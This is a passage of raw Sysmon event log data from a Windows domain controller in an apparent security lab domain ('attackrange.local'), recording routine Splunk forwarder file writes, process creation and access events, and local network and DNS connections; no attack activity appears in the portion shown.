Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE9449483D7FBC40FD6D6178110E94C0,SHA256=E1E163A403DDFCA4CF8045ABB60DB6927A801B8D13A04A3863A8CDD0671247DC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002204509Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:18.525{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=100EE6758CF7AF2A4BB15FDED9BCA6AA,SHA256=0C84A433BAB9933C7C79CE91486117934A36E5B9717E4DBBC1439B3674ADB3F9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002204508Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:18.150{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-EA4A-6040-684E-00000000AD01}6288C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204507Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:18.150{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204506Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:18.150{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204505Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:18.150{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204504Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:18.150{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204503Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:18.150{5ABCFE62-842D-603E-0500-00000000AD01}416432C:\Windows\system32\csrss.exe{5ABCFE62-EA4A-6040-684E-00000000AD01}6288C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002204502Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:18.150{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-EA4A-6040-684E-00000000AD01}6288C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002204501Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:18.150{5ABCFE62-EA4A-6040-684E-00000000AD01}6288C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002204530Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:19.837{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=15DEBB49F9679651BD3CED31D3C3406C,SHA256=06667FE435FF9F36FF078BE73BDBA7AC5FD54D621E438ED466C2F021181EF16D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002204529Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:19.618{5ABCFE62-EA4B-6040-6A4E-00000000AD01}69202644C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002204528Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:19.587{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ECE91437C8780645C6F9DC2DF13AD27F,SHA256=1C8D8DB14FAF44507180E5F21F8AD3F534EC04175D7B9F24EB012C4470250E76,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002204527Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:19.493{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-EA4B-6040-6A4E-00000000AD01}6920C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204526Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:19.493{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204525Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:19.493{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204524Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:19.493{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204523Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:19.493{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204522Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:19.493{5ABCFE62-842D-603E-0500-00000000AD01}416532C:\Windows\system32\csrss.exe{5ABCFE62-EA4B-6040-6A4E-00000000AD01}6920C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002204521Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:19.493{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-EA4B-6040-6A4E-00000000AD01}6920C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002204520Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:19.494{5ABCFE62-EA4B-6040-6A4E-00000000AD01}6920C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002204531Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:20.618{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=92BC65B32876206BC125CFAE134C6F78,SHA256=6801EC77CF531C3A1EFA99C3525C365C6320DE3AB1DC094F0D4F8CBD6A936842,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002204533Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:21.681{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=09B5FA45FCC85DC9590EF6975417DF18,SHA256=F0253BEC3BEA404623103B042C4942AC88DB595652A03E62E597973C254A2029,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002204532Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:21.322{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B49FC59AD6C8B4CB6A56D65CF3700DE6,SHA256=C949C62E51FB1113505DA05E7FC171DDA35E23A51E233B896A7E6AA859067D49,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002204537Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:22.696{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=44B8807E482FB2D43095F42474074EFD,SHA256=80BA4C3BE2BACBB27370474E15EED7A07279F9A90AA5005F201B5ABBD975435C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002204536Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:22.478{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D22146C7B6D234905AACD3564F537A15,SHA256=834DDE9E3202E79CD819BB980AC3A2FB29DAB5BED1643F1F4B3DEBED43CBE982,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002204535Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:22.243{5ABCFE62-842F-603E-1100-00000000AD01}620NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=B93FC2351A39833DCD00F95119E0A851,SHA256=98872851876AC6A239A6D56CFF54322702E5B25748037D7D4D6A18D35A9E104E,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002204534Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:17.939{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60756-false10.0.1.12-8000- 23542300x80000000000000002204538Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:23.712{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=328AFF7AF64BF7753A5F18D8906E6946,SHA256=E9DE1167F3BD02C46343374F7F15A4CB3EEFBA5F729052EF49A97AF6541C5BC5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002204540Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:24.853{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2596291BF72DE8D8810164A229381398,SHA256=CA79975585560AC8CB9650D35332338D79F6DC4B677D15049318EAC7AA571399,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002204539Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:24.712{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4553ABA2E47C4D6DF19B6DDFC854A8BE,SHA256=B074596D35C883C3A055972D566514A4B793A5A92882AE6A24D2DE4D87CF17D9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002204542Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:25.743{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=87464697CD0C119F75BA71DD61963126,SHA256=D9F7B36C914159AFB10C0BD082FD58D50267F87601842155FD95670DB2CDA37C,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002204541Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:21.470{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local58749- 23542300x80000000000000002204545Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:26.775{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF5D45D5D0DECDB73EC2512604EC4CE9,SHA256=AD14881F2812DAFB5EA1D78EFDD2F9FC18D0195707112EAC8A0B7C9B02FAA943,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002204544Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:22.485{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-58749- 23542300x80000000000000002204543Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:26.212{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=19C462C93D4CAA5F1B7D09FA85A71ACB,SHA256=376C1240CFF901ACD59E46F6CDEE9A425C1D5130AF6BE327FE76E2FAC7D2CC50,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002204547Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:27.790{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A7826611259E6F4657DC40F0A161C2AA,SHA256=211F7B392AA60A65751E43C0584858C41B1C4AF81E0FFB252356317C131ECFF5,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002204546Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:23.002{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60757-false10.0.1.12-8000- 23542300x80000000000000002204549Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:28.806{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=90F822ABAAC798CC3A2C9512806E39B2,SHA256=8DC81B7525F722A4541FF4477DB51D841066919AFDE46B6615905A4B48841D41,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002204548Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:28.696{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT 